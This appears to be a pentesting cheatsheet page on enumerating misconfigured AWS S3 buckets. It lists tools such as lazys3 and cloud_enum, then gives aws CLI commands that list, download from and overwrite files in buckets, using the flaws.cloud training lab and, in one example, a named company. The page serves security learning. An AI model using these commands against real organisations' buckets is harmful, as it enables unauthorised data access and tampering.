search
HomeWriteupsResourcesCheatsheets

S3 Bucket Enumeration

hashtag
Lazys3 - Ruby Script

LogoGitHub - nahamsec/lazys3GitHubchevron-right

  • ruby lazys3.rb <company>

  • ruby lazys3.rb pakwheels

hashtag
Cloud_enum

  • sudo apt install cloud-enum

  • cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp

hashtag
S3BucketList - Browser Extension

Manual Installation

LogoGitHub - AlecBlance/S3BucketList: Chrome and Firefox extension that lists Amazon S3 Buckets while browsingGitHubchevron-right

hashtag
Exploiting S3 UnAuthenticated

  • sudo apt-get install awscli

  • cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp

  • aws s3 ls s3://flaws.cloud/ --no-sign-request

  • Download - aws s3 cp s3://flaws.cloud/secret.html ./ --no-sign-request

  • Upload - aws s3 cp ./index.html s3://flaws.cloud/secret.html --no-sign-request

hashtag
Exploiting S3 Authenticated

  • Create a free AWS account

  • Go to AWS IAM dashboard

  • Users → Add New user with programmatic access credential type

  • Once user is created, note down the access key and secret access key

  • Click User → Permissions → Add permissions → Attach existing policies → AmazonS3FullAccess

  • aws configure --profile someone

  • aws s3 --profile someone ls s3://flaws.cloud/ --no-sign-request

  • aws s3 --profile someone cp s3://flaws.cloud/something.html ./

PreviousWifi HackingNextCryptography

Last updated